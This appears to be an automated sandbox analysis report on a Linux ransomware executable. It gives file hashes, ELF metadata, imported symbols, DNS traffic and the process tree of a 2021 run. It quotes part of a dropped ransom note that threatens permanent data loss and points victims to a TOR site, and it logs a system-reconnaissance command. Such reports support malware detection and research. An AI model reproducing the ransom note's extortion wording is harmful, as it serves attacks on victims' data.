                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /run/user/1000/dconf/user
                  Process:/usr/bin/mousepad
                  File Type:data
                  Category:dropped
                  Size (bytes):7
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3::
                  MD5:D310A40483F9399DD7ED1712E0FDD702
                  SHA1:77CE0377DEFBD11B77B1F4AD54CA40EA5EF28490
                  SHA-256:837885C8F8091AEAEB9EC3C3F85A6FF470A415E610B8BA3E49F9B33C9CF9D619
                  SHA-512:76AFCA18A9B81FFB967FFCF0460ED221C3605D3820057214D785FA88259BB5CB729576178E6EDB0134F645D2E2E92CBABF1333462F3B9058692C950F51C64A92
                  Malicious:false
                  Reputation:low
                  Preview: .......
                  /run/utmp
                  Process:/usr/lib/libvte9/gnome-pty-helper
                  File Type:data
                  Category:dropped
                  Size (bytes):384
                  Entropy (8bit):0.6184662191001266
                  Encrypted:false
                  SSDEEP:3:ovl4P/llJ/cXll//TkT9l:yan/xc1toT
                  MD5:EE48855BEC00A484A95ABC5CB2A4BBFF
                  SHA1:9FA7D63C83A1B47B1BF94EDDA8DAC354E46F6C29
                  SHA-256:93453BB035254C65DFF273656AC42859C27622A6A1C2911983066A4A443A8B01
                  SHA-512:CC7D741F43017EDABDAC2BE8AD60973543557502C79286F74C5D8F26EA3A5A6CE978497ACFCB3619E71615BAA527E0EAB3A2E0076801F5D58DFE79435B256459
                  Malicious:false
                  Reputation:low
                  Preview: ........pts/1.........................../1..user............................:0.0....................................................................................................................................................................................................................................................................=,.`.t......................................
                  /tmp/sh-thd-1141883615
                  Process:/bin/bash
                  File Type:ASCII text
                  Category:dropped
                  Size (bytes):8
                  Entropy (8bit):3.0
                  Encrypted:false
                  SSDEEP:3:oWn:5n
                  MD5:81E0CB9349E9DAA102291F316E47199A
                  SHA1:87657887036D18A6A94D721566EF7282C040BB54
                  SHA-256:3FD53938491164AFF2C86905C4F9B30ED4D676D09E5FDAF1011854C329F65CEA
                  SHA-512:32B823B5BADF22A844B73CEF8F1D685CB2CAEEB67F8687C497862C85AABABEBC992F29DA1D38479D01E5912CFD7DC3769110BF6328981FFECBFD73AB888F11B8
                  Malicious:false
                  Reputation:low
                  Preview: Desktop.
                  /tmp/sh-thd-190145492
                  Process:/bin/bash
                  File Type:ASCII text
                  Category:dropped
                  Size (bytes):8
                  Entropy (8bit):3.0
                  Encrypted:false
                  SSDEEP:3:oWn:5n
                  MD5:81E0CB9349E9DAA102291F316E47199A
                  SHA1:87657887036D18A6A94D721566EF7282C040BB54
                  SHA-256:3FD53938491164AFF2C86905C4F9B30ED4D676D09E5FDAF1011854C329F65CEA
                  SHA-512:32B823B5BADF22A844B73CEF8F1D685CB2CAEEB67F8687C497862C85AABABEBC992F29DA1D38479D01E5912CFD7DC3769110BF6328981FFECBFD73AB888F11B8
                  Malicious:false
                  Reputation:low
                  Preview: Desktop.
                  /tmp/sh-thd-2365406056
                  Process:/bin/bash
                  File Type:ASCII text
                  Category:dropped
                  Size (bytes):19
                  Entropy (8bit):3.892407118592878
                  Encrypted:false
                  SSDEEP:3:ozSuXFdpvn:e7n
                  MD5:1F56471EEA5F42526AFA12AC5B324E22
                  SHA1:BC4A01348938CF652FBAC693EB15F710F46813EF
                  SHA-256:1FD533D11D891220076FB2B5062B8AD5AA342970904B2054839514BDD5E71EA6
                  SHA-512:711C8D4DB7A6372BCB7CAB1A119B34BDD0B3E86232968A6B5B7BCCE18DA14DC40FE83495ADA36844DF406AC84BED761A99D977AA3B92FF3EB83785D5F93DEF46
                  Malicious:false
                  Reputation:low
                  Preview: Desktop/wQN5w2558L.
                  /var/log/wtmp
                  Process:/usr/lib/libvte9/gnome-pty-helper
                  File Type:data
                  Category:dropped
                  Size (bytes):384
                  Entropy (8bit):0.6184662191001266
                  Encrypted:false
                  SSDEEP:3:ovl4P/llJ/cXll//TkT9l:yan/xc1toT
                  MD5:EE48855BEC00A484A95ABC5CB2A4BBFF
                  SHA1:9FA7D63C83A1B47B1BF94EDDA8DAC354E46F6C29
                  SHA-256:93453BB035254C65DFF273656AC42859C27622A6A1C2911983066A4A443A8B01
                  SHA-512:CC7D741F43017EDABDAC2BE8AD60973543557502C79286F74C5D8F26EA3A5A6CE978497ACFCB3619E71615BAA527E0EAB3A2E0076801F5D58DFE79435B256459
                  Malicious:false
                  Reputation:low
                  Preview: ........pts/1.........................../1..user............................:0.0....................................................................................................................................................................................................................................................................=,.`.t......................................

                  Static File Info

                  General

                  File type:ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, stripped
                  Entropy (8bit):5.809766949433206
                  TrID:
                  • ELF Executable and Linkable format (Linux) (4029/14) 49.77%
                  • ELF Executable and Linkable format (generic) (4004/1) 49.46%
                  • Lumena CEL bitmap (63/63) 0.78%
                  File name:wQN5w2558L
                  File size:105232
                  MD5:395249d3e6dae1caff6b5b2e1f75bacd
                  SHA1:29f16c046a344e0d0adfea80d5d7958d6b6b8cfa
                  SHA256:ea1872b2835128e3cb49a0bc27e4727ca33c4e6eba1e80422db19b505f965bc4
                  SHA512:54bf867c030f708eb0975825d7c8e4c1b3bca49451bc08ebc3bb9fbd10e9ffdce82332ca200ee960b8ce7dfee1247e52c4ca11041cd976aa7cee6d4957144714
                  SSDEEP:3072:db+XoBHfYu9gggwgggwgggwgggwggg9k+LoS:dpyvo
                  File Content Preview:.ELF..............>.....0.@.....@...................@.8...@.............@.......@.@.....@.@.....................................8.......8.@.....8.@...............................................@.......@......K.......K........ ..............M.......Ma....

                  Static ELF Info

                  ELF header

                  Class:ELF64
                  Data:2's complement, little endian
                  Version:1 (current)
                  Machine:Advanced Micro Devices X86-64
                  Version Number:0x1
                  Type:EXEC (Executable file)
                  OS/ABI:UNIX - System V
                  ABI Version:0
                  Entry Point Address:0x401530
                  Flags:0x0
                  ELF Header Size:64
                  Program Header Offset:64
                  Program Header Size:56
                  Number of Program Headers:9
                  Section Header Offset:103440
                  Section Header Size:64
                  Number of Section Headers:28
                  Header String Table Index:27

                  Sections

                  NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                  NULL0x00x00x00x00x0000
                  .interpPROGBITS0x4002380x2380x1c0x00x2A001
                  .note.ABI-tagNOTE0x4002540x2540x200x00x2A004
                  .note.gnu.build-idNOTE0x4002740x2740x240x00x2A004
                  .gnu.hashGNU_HASH0x4002980x2980x280x00x2A508
                  .dynsymDYNSYM0x4002c00x2c00x5b80x180x2A618
                  .dynstrSTRTAB0x4008780x8780x2950x00x2A001
                  .gnu.versionVERSYM0x400b0e0xb0e0x7a0x20x2A502
                  .gnu.version_rVERNEED0x400b880xb880x900x00x2A638
                  .rela.dynRELA0x400c180xc180x480x180x2A508
                  .rela.pltRELA0x400c600xc600x5280x180x2A5128
                  .initPROGBITS0x4011880x11880x1a0x00x6AX004
                  .pltPROGBITS0x4011b00x11b00x3800x100x6AX0016
                  .textPROGBITS0x4015300x15300xeaf20x00x6AX0016
                  .finiPROGBITS0x4100240x100240x90x00x6AX004
                  .rodataPROGBITS0x4100400x100400x37000x00x2A0032
                  .eh_frame_hdrPROGBITS0x4137400x137400x4140x00x2A004
                  .eh_framePROGBITS0x413b580x13b580x109c0x00x2A008
                  .init_arrayINIT_ARRAY0x614df00x14df00x80x00x3WA008
                  .fini_arrayFINI_ARRAY0x614df80x14df80x80x00x3WA008
                  .jcrPROGBITS0x614e000x14e000x80x00x3WA008
                  .dynamicDYNAMIC0x614e080x14e080x1f00x100x3WA608
                  .gotPROGBITS0x614ff80x14ff80x80x80x3WA008
                  .got.pltPROGBITS0x6150000x150000x1d00x80x3WA008
                  .dataPROGBITS0x6151e00x151e00x410c0x00x3WA0032
                  .bssNOBITS0x6193000x192ec0x1013280x00x3WA0032
                  .commentPROGBITS0x00x192ec0x2b0x10x30MS001
                  .shstrtabSTRTAB0x00x193170xf80x00x0001

                  Program Segments

                  TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                  PHDR0x400x4000400x4000400x1f80x1f81.73330x5R E0x8
                  INTERP0x2380x4002380x4002380x1c0x1c3.94080x4R 0x1/lib64/ld-linux-x86-64.so.2.interp
                  LOAD0x00x4000000x4000000x14bf40x14bf43.28960x5R E0x200000.interp .note.ABI-tag .note.gnu.build-id .gnu.hash .dynsym .dynstr .gnu.version .gnu.version_r .rela.dyn .rela.plt .init .plt .text .fini .rodata .eh_frame_hdr .eh_frame
                  LOAD0x14df00x614df00x614df00x44fc0x1058381.76410x6RW 0x200000.init_array .fini_array .jcr .dynamic .got .got.plt .data .bss
                  DYNAMIC0x14e080x614e080x614e080x1f00x1f01.26200x6RW 0x8.dynamic
                  NOTE0x2540x4002540x4002540x440x442.53710x4R 0x4.note.ABI-tag .note.gnu.build-id
                  GNU_EH_FRAME0x137400x4137400x4137400x4140x4142.86040x4R 0x4.eh_frame_hdr
                  GNU_STACK0x00x00x00x00x00.00000x6RW 0x10
                  GNU_RELRO0x14df00x614df00x614df00x2100x2101.25370x4R 0x1.init_array .fini_array .jcr .dynamic .got

                  Dynamic Tags

                  TypeMetaValueTag
                  DT_NEEDEDsharedliblibm.so.60x1
                  DT_NEEDEDsharedliblibpthread.so.00x1
                  DT_NEEDEDsharedliblibc.so.60x1
                  DT_INITvalue0x4011880xc
                  DT_FINIvalue0x4100240xd
                  DT_INIT_ARRAYvalue0x614df00x19
                  DT_INIT_ARRAYSZbytes80x1b
                  DT_FINI_ARRAYvalue0x614df80x1a
                  DT_FINI_ARRAYSZbytes80x1c
                  DT_GNU_HASHvalue0x4002980x6ffffef5
                  DT_STRTABvalue0x4008780x5
                  DT_SYMTABvalue0x4002c00x6
                  DT_STRSZbytes6610xa
                  DT_SYMENTbytes240xb
                  DT_DEBUGvalue0x00x15
                  DT_PLTGOTvalue0x6150000x3
                  DT_PLTRELSZbytes13200x2
                  DT_PLTRELpltrelDT_RELA0x14
                  DT_JMPRELvalue0x400c600x17
                  DT_RELAvalue0x400c180x7
                  DT_RELASZbytes720x8
                  DT_RELAENTbytes240x9
                  DT_VERNEEDvalue0x400b880x6ffffffe
                  DT_VERNEEDNUMvalue30x6fffffff
                  DT_VERSYMvalue0x400b0e0x6ffffff0
                  DT_NULLvalue0x00x0

                  Symbols

                  NameVersion Info NameVersion Info File NameSection NameValueSizeSymbol TypeSymbol BindSymbol VisibilityNdx
                  .dynsym0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                  _ITM_deregisterTMCloneTable.dynsym0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                  _ITM_registerTMCloneTable.dynsym0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                  _Jv_RegisterClasses.dynsym0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                  __ctype_b_locGLIBC_2.3libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                  __gmon_start__.dynsym0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                  __libc_start_mainGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                  atoiGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                  callocGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                  chmodGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                  closeGLIBC_2.2.5libpthread.so.0.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                  closedirGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                  exitGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                  fcloseGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                  fopenGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                  freadGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                  freeGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                  fseekGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                  ftellGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                  fwriteGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                  getopt_longGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                  mallocGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                  memsetGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                  openGLIBC_2.2.5libpthread.so.0.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                  opendirGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                  optargGLIBC_2.2.5libc.so.6.dynsym0x6193008OBJECT<unknown>DEFAULT25
                  pcloseGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                  perrorGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                  popenGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                  powGLIBC_2.2.5libm.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                  printfGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                  pthread_cond_broadcastGLIBC_2.3.2libpthread.so.0.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                  pthread_cond_initGLIBC_2.3.2libpthread.so.0.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                  pthread_cond_signalGLIBC_2.3.2libpthread.so.0.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                  pthread_cond_waitGLIBC_2.3.2libpthread.so.0.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                  pthread_createGLIBC_2.2.5libpthread.so.0.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                  pthread_exitGLIBC_2.2.5libpthread.so.0.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                  pthread_mutex_initGLIBC_2.2.5libpthread.so.0.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                  pthread_mutex_lockGLIBC_2.2.5libpthread.so.0.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                  pthread_mutex_unlockGLIBC_2.2.5libpthread.so.0.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                  pthread_timedjoin_npGLIBC_2.3.3libpthread.so.0.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                  putsGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                  readGLIBC_2.2.5libpthread.so.0.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                  readdirGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                  removeGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                  renameGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                  rewindGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                  snprintfGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                  sprintfGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                  stderrGLIBC_2.2.5libc.so.6.dynsym0x6193088OBJECT<unknown>DEFAULT25
                  strcatGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                  strchrGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                  strcmpGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                  strcpyGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                  strdupGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                  strlenGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                  strncpyGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                  strstrGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                  timeGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                  toupperGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                  usleepGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF

                  Network Behavior

                  Network Port Distribution

                  UDP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Jul 1, 2021 20:59:58.702311993 MESZ4329453192.168.1.1008.8.8.8
                  Jul 1, 2021 20:59:58.702647924 MESZ3869753192.168.1.1008.8.8.8
                  Jul 1, 2021 20:59:58.748735905 MESZ53432948.8.8.8192.168.1.100
                  Jul 1, 2021 20:59:58.750195026 MESZ53386978.8.8.8192.168.1.100

                  System Behavior

                  Analysis Process: wrapper-1.0 PID: 2755 Parent PID: 2123

                  General

                  Start time:20:57:33
                  Start date:01/07/2021
                  Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-1.0
                  Arguments:n/a
                  File size:0 bytes
                  MD5 hash:00000000000000000000000000000000

                  Chronological Activities

                  Analysis Process: exo-open PID: 2755 Parent PID: 2123

                  General

                  Start time:20:57:33
                  Start date:01/07/2021
                  Path:/usr/bin/exo-open
                  Arguments:exo-open --launch TerminalEmulator
                  File size:22856 bytes
                  MD5 hash:39c5fa78f1cb3d950b9944f784018d3a

                  Chronological Activities

                  Analysis Process: exo-open PID: 2784 Parent PID: 2755

                  General

                  Start time:20:57:33
                  Start date:01/07/2021
                  Path:/usr/bin/exo-open
                  Arguments:n/a
                  File size:22856 bytes
                  MD5 hash:39c5fa78f1cb3d950b9944f784018d3a

                  Chronological Activities

                  Analysis Process: exo-open PID: 2785 Parent PID: 2784

                  General

                  Start time:20:57:33
                  Start date:01/07/2021
                  Path:/usr/bin/exo-open
                  Arguments:n/a
                  File size:22856 bytes
                  MD5 hash:39c5fa78f1cb3d950b9944f784018d3a

                  Chronological Activities

                  Analysis Process: exo-helper-1 PID: 2785 Parent PID: 1889

                  General

                  Start time:20:57:33
                  Start date:01/07/2021
                  Path:/usr/lib/x86_64-linux-gnu/xfce4/exo-1/exo-helper-1
                  Arguments:/usr/lib/x86_64-linux-gnu/xfce4/exo-1/exo-helper-1 --launch TerminalEmulator
                  File size:63560 bytes
                  MD5 hash:c27a648e34ba5ce625d064af015be147

                  Chronological Activities

                  Analysis Process: exo-helper-1 PID: 2794 Parent PID: 2785

                  General

                  Start time:20:57:33
                  Start date:01/07/2021
                  Path:/usr/lib/x86_64-linux-gnu/xfce4/exo-1/exo-helper-1
                  Arguments:n/a
                  File size:63560 bytes
                  MD5 hash:c27a648e34ba5ce625d064af015be147

                  Chronological Activities

                  Analysis Process: xfce4-terminal PID: 2794 Parent PID: 2785

                  General

                  Start time:20:57:33
                  Start date:01/07/2021
                  Path:/usr/bin/xfce4-terminal
                  Arguments:/usr/bin/xfce4-terminal
                  File size:182624 bytes
                  MD5 hash:cd860c0a24d13e4caacc08ebe89aa930

                  Chronological Activities

                  Analysis Process: xfce4-terminal PID: 2806 Parent PID: 2794

                  General

                  Start time:20:57:33
                  Start date:01/07/2021
                  Path:/usr/bin/xfce4-terminal
                  Arguments:n/a
                  File size:182624 bytes
                  MD5 hash:cd860c0a24d13e4caacc08ebe89aa930

                  Chronological Activities

                  Analysis Process: gnome-pty-helper PID: 2806 Parent PID: 2794

                  General

                  Start time:20:57:33
                  Start date:01/07/2021
                  Path:/usr/lib/libvte9/gnome-pty-helper
                  Arguments:gnome-pty-helper
                  File size:14976 bytes
                  MD5 hash:4847c5390dc12d6acfdd19fef054f30a

                  Chronological Activities

                  Analysis Process: xfce4-terminal PID: 2807 Parent PID: 2794

                  General

                  Start time:20:57:33
                  Start date:01/07/2021
                  Path:/usr/bin/xfce4-terminal
                  Arguments:n/a
                  File size:182624 bytes
                  MD5 hash:cd860c0a24d13e4caacc08ebe89aa930

                  Chronological Activities

                  Analysis Process: bash PID: 2807 Parent PID: 2794

                  General

                  Start time:20:57:33
                  Start date:01/07/2021
                  Path:/bin/bash
                  Arguments:bash
                  File size:1037528 bytes
                  MD5 hash:5e666695cf08d1638bb85684e30185ee

                  Chronological Activities

                  Analysis Process: bash PID: 2824 Parent PID: 2807

                  General

                  Start time:20:57:33
                  Start date:01/07/2021
                  Path:/bin/bash
                  Arguments:n/a
                  File size:1037528 bytes
                  MD5 hash:5e666695cf08d1638bb85684e30185ee

                  Chronological Activities

                  Analysis Process: bash PID: 2825 Parent PID: 2824

                  General

                  Start time:20:57:33
                  Start date:01/07/2021
                  Path:/bin/bash
                  Arguments:n/a
                  File size:1037528 bytes
                  MD5 hash:5e666695cf08d1638bb85684e30185ee

                  Chronological Activities

                  Analysis Process: lesspipe PID: 2825 Parent PID: 2824

                  General

                  Start time:20:57:33
                  Start date:01/07/2021
                  Path:/usr/bin/lesspipe
                  Arguments:/bin/sh /usr/bin/lesspipe
                  File size:13 bytes
                  MD5 hash:80a46999efd72ca140acc1990050d65c

                  Chronological Activities

                  Analysis Process: lesspipe PID: 2829 Parent PID: 2825

                  General

                  Start time:20:57:33
                  Start date:01/07/2021
                  Path:/usr/bin/lesspipe
                  Arguments:n/a
                  File size:13 bytes
                  MD5 hash:80a46999efd72ca140acc1990050d65c

                  Chronological Activities

                  Analysis Process: basename PID: 2829 Parent PID: 2825

                  General

                  Start time:20:57:33
                  Start date:01/07/2021
                  Path:/usr/bin/basename
                  Arguments:basename /usr/bin/lesspipe
                  File size:31408 bytes
                  MD5 hash:fd7bba8b11b99ec7559f30226c79a729

                  Chronological Activities

                  Analysis Process: lesspipe PID: 2831 Parent PID: 2825

                  General

                  Start time:20:57:33
                  Start date:01/07/2021
                  Path:/usr/bin/lesspipe
                  Arguments:n/a
                  File size:13 bytes
                  MD5 hash:80a46999efd72ca140acc1990050d65c

                  Chronological Activities

                  Analysis Process: lesspipe PID: 2832 Parent PID: 2831

                  General

                  Start time:20:57:33
                  Start date:01/07/2021
                  Path:/usr/bin/lesspipe
                  Arguments:n/a
                  File size:13 bytes
                  MD5 hash:80a46999efd72ca140acc1990050d65c

                  Chronological Activities

                  Analysis Process: dirname PID: 2832 Parent PID: 2831

                  General

                  Start time:20:57:33
                  Start date:01/07/2021
                  Path:/usr/bin/dirname
                  Arguments:dirname /usr/bin/lesspipe
                  File size:31408 bytes
                  MD5 hash:109f56157fe89667043fd1cca87b24fa

                  Chronological Activities

                  Analysis Process: bash PID: 2833 Parent PID: 2807

                  General

                  Start time:20:57:33
                  Start date:01/07/2021
                  Path:/bin/bash
                  Arguments:n/a
                  File size:1037528 bytes
                  MD5 hash:5e666695cf08d1638bb85684e30185ee

                  Chronological Activities

                  Analysis Process: bash PID: 2834 Parent PID: 2833

                  General

                  Start time:20:57:33
                  Start date:01/07/2021
                  Path:/bin/bash
                  Arguments:n/a
                  File size:1037528 bytes
                  MD5 hash:5e666695cf08d1638bb85684e30185ee

                  Chronological Activities

                  Analysis Process: dircolors PID: 2834 Parent PID: 2833

                  General

                  Start time:20:57:33
                  Start date:01/07/2021
                  Path:/usr/bin/dircolors
                  Arguments:dircolors -b
                  File size:39640 bytes
                  MD5 hash:1c7070b855358283a329458ff4fbebab

                  Chronological Activities

                  Analysis Process: bash PID: 2863 Parent PID: 2807

                  General

                  Start time:20:57:33
                  Start date:01/07/2021
                  Path:/bin/bash
                  Arguments:n/a
                  File size:1037528 bytes
                  MD5 hash:5e666695cf08d1638bb85684e30185ee

                  Chronological Activities

                  Analysis Process: bash PID: 2864 Parent PID: 2863

                  General

                  Start time:20:57:33
                  Start date:01/07/2021
                  Path:/bin/bash
                  Arguments:n/a
                  File size:1037528 bytes
                  MD5 hash:5e666695cf08d1638bb85684e30185ee

                  Chronological Activities

                  Analysis Process: ls PID: 2864 Parent PID: 2863

                  General

                  Start time:20:57:33
                  Start date:01/07/2021
                  Path:/bin/ls
                  Arguments:ls /etc/bash_completion.d
                  File size:126584 bytes
                  MD5 hash:f3b92d795c9ee0725c160680acd084d9

                  Chronological Activities

                  Analysis Process: bash PID: 2873 Parent PID: 2807

                  General

                  Start time:20:57:42
                  Start date:01/07/2021
                  Path:/bin/bash
                  Arguments:n/a
                  File size:1037528 bytes
                  MD5 hash:5e666695cf08d1638bb85684e30185ee

                  Chronological Activities

                  Analysis Process: bash PID: 2874 Parent PID: 2807

                  General

                  Start time:20:57:42
                  Start date:01/07/2021
                  Path:/bin/bash
                  Arguments:n/a
                  File size:1037528 bytes
                  MD5 hash:5e666695cf08d1638bb85684e30185ee

                  Chronological Activities

                  Analysis Process: bash PID: 2875 Parent PID: 2807

                  General

                  Start time:20:57:44
                  Start date:01/07/2021
                  Path:/bin/bash
                  Arguments:n/a
                  File size:1037528 bytes
                  MD5 hash:5e666695cf08d1638bb85684e30185ee

                  Chronological Activities

                  Analysis Process: bash PID: 2876 Parent PID: 2807

                  General

                  Start time:20:57:44
                  Start date:01/07/2021
                  Path:/bin/bash
                  Arguments:n/a
                  File size:1037528 bytes
                  MD5 hash:5e666695cf08d1638bb85684e30185ee

                  Chronological Activities

                  Analysis Process: bash PID: 2877 Parent PID: 2807

                  General

                  Start time:20:57:47
                  Start date:01/07/2021
                  Path:/bin/bash
                  Arguments:n/a
                  File size:1037528 bytes
                  MD5 hash:5e666695cf08d1638bb85684e30185ee

                  Chronological Activities

                  Analysis Process: mv PID: 2877 Parent PID: 2807

                  General

                  Start time:20:57:47
                  Start date:01/07/2021
                  Path:/bin/mv
                  Arguments:mv Desktop/wQN5w2558L .
                  File size:130488 bytes
                  MD5 hash:0cdfdd010d5f4acab64a1d89066c92e9

                  Chronological Activities

                  Analysis Process: bash PID: 2888 Parent PID: 2807

                  General

                  Start time:20:57:56
                  Start date:01/07/2021
                  Path:/bin/bash
                  Arguments:n/a
                  File size:1037528 bytes
                  MD5 hash:5e666695cf08d1638bb85684e30185ee

                  Chronological Activities

                  Analysis Process: wQN5w2558L PID: 2888 Parent PID: 2807

                  General

                  Start time:20:57:56
                  Start date:01/07/2021
                  Path:./wQN5w2558L
                  Arguments:./wQN5w2558L
                  File size:0 bytes
                  MD5 hash:unknown

                  Chronological Activities

                  Analysis Process: wQN5w2558L PID: 2889 Parent PID: 2888

                  General

                  Start time:20:57:56
                  Start date:01/07/2021
                  Path:./wQN5w2558L
                  Arguments:n/a
                  File size:0 bytes
                  MD5 hash:unknown

                  Chronological Activities

                  Analysis Process: dash PID: 2889 Parent PID: 2888

                  General

                  Start time:20:57:56
                  Start date:01/07/2021
                  Path:/bin/dash
                  Arguments:sh -c "uname -a && echo \" | \" && hostname"
                  File size:154072 bytes
                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                  Chronological Activities

